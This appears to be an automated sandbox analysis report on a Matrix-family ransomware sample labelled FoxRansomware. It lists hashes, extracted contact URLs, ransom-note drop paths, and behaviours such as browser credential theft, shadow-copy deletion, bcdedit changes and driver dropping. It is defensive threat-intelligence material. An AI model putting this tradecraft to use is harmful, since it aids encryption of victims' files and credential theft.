Overview
overview
10Static
static
3FoxRansomware.zip
windows10-1703-x64
1FoxRansomw...65.exe
windows10-1703-x64
10FoxRansomw...a7.exe
windows10-1703-x64
10FoxRansomw...20.exe
windows10-1703-x64
10FoxRansomw...0b.exe
windows10-1703-x64
10FoxRansomw...53.exe
windows10-1703-x64
10FoxRansomw...b1.exe
windows10-1703-x64
10Analysis
-
max time kernel
139s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
25-07-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware.zip
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10-20240404-en
Behavioral task
behavioral5
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10-20240404-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File created C:\Users\Admin\Searches\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Comms\UnistoreDB\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\am_ET\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Favorites\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\bin\server\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\TileDataLayer\Database\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Documents\OneNote Notebooks\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 7848 bcdedit.exe 7748 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 136 3156 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
5E68lMYn64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS 5E68lMYn64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
5E68lMYn64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" 5E68lMYn64.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Executes dropped EXE 64 IoCs
Processes:
NWYsCRGT.exe5E68lMYn.exe5E68lMYn64.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exe5E68lMYn.exepid process 648 NWYsCRGT.exe 6080 5E68lMYn.exe 5068 5E68lMYn64.exe 7976 5E68lMYn.exe 7004 5E68lMYn.exe 5544 5E68lMYn.exe 5928 5E68lMYn.exe 7172 5E68lMYn.exe 7484 5E68lMYn.exe 7392 5E68lMYn.exe 7408 5E68lMYn.exe 3632 5E68lMYn.exe 7452 5E68lMYn.exe 8004 5E68lMYn.exe 7768 5E68lMYn.exe 268 5E68lMYn.exe 7244 5E68lMYn.exe 4772 5E68lMYn.exe 5428 5E68lMYn.exe 7928 5E68lMYn.exe 8036 5E68lMYn.exe 5832 5E68lMYn.exe 8116 5E68lMYn.exe 7116 5E68lMYn.exe 7088 5E68lMYn.exe 5728 5E68lMYn.exe 5500 5E68lMYn.exe 5948 5E68lMYn.exe 3504 5E68lMYn.exe 5320 5E68lMYn.exe 5228 5E68lMYn.exe 5244 5E68lMYn.exe 5332 5E68lMYn.exe 5876 5E68lMYn.exe 1096 5E68lMYn.exe 1484 5E68lMYn.exe 5304 5E68lMYn.exe 5812 5E68lMYn.exe 5724 5E68lMYn.exe 1092 5E68lMYn.exe 924 5E68lMYn.exe 6212 5E68lMYn.exe 6236 5E68lMYn.exe 1192 5E68lMYn.exe 1468 5E68lMYn.exe 5372 5E68lMYn.exe 6256 5E68lMYn.exe 6360 5E68lMYn.exe 6376 5E68lMYn.exe 4092 5E68lMYn.exe 2136 5E68lMYn.exe 6560 5E68lMYn.exe 7488 5E68lMYn.exe 1380 5E68lMYn.exe 6836 5E68lMYn.exe 5412 5E68lMYn.exe 8088 5E68lMYn.exe 5432 5E68lMYn.exe 1100 5E68lMYn.exe 6596 5E68lMYn.exe 7200 5E68lMYn.exe 5676 5E68lMYn.exe 2828 5E68lMYn.exe 4280 5E68lMYn.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 6316 takeown.exe 6360 takeown.exe 6588 takeown.exe 5984 5732 takeown.exe 7952 takeown.exe 5832 takeown.exe 5620 takeown.exe 7584 4904 5780 takeown.exe 620 takeown.exe 6552 takeown.exe 8076 takeown.exe 8160 2316 takeown.exe 5708 takeown.exe 7140 takeown.exe 5184 takeown.exe 4340 8140 5740 5960 takeown.exe 7264 takeown.exe 920 takeown.exe 6820 takeown.exe 4324 takeown.exe 2176 takeown.exe 6332 takeown.exe 5728 5892 4892 takeown.exe 5900 6824 7020 takeown.exe 4664 takeown.exe 976 takeown.exe 6636 5236 3944 takeown.exe 4300 takeown.exe 2576 takeown.exe 6460 takeown.exe 5312 4772 5024 6304 5220 6336 takeown.exe 5940 takeown.exe 8188 takeown.exe 5768 takeown.exe 4812 6268 takeown.exe 1664 takeown.exe 5640 takeown.exe 6812 6796 6180 takeown.exe 7456 takeown.exe 7792 takeown.exe 5596 takeown.exe 2908 7656 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral7/memory/6080-4414-0x0000000000400000-0x0000000000477000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe upx behavioral7/memory/7976-5213-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7004-5215-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7004-5219-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5544-5221-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5544-5223-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5928-5225-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7172-5227-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7484-5230-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7392-5232-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7408-5234-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6080-5236-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/3632-5237-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7452-5239-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/8004-5243-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7768-5246-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/268-5248-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7244-5251-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/4772-5253-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5428-5256-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7928-5259-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/8036-5261-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5832-5263-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/8116-5265-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7116-5270-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7088-5272-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5728-5274-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5500-5277-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5948-5280-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/3504-5283-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5320-5285-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5228-5287-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5244-5291-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5332-5294-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5876-5296-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1096-5298-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1484-5300-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5304-5302-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5812-5304-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5724-5306-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5724-5307-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1092-5310-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/924-5314-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6212-5317-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6236-5319-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1192-5321-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1468-5323-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5372-5325-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6256-5327-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6360-5329-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6376-5331-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/4092-5335-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/2136-5338-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6560-5340-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7488-5342-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1380-5344-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6836-5346-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5412-5348-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/8088-5349-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/5432-5350-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/1100-5351-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/6596-5354-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral7/memory/7200-5355-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 26 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification 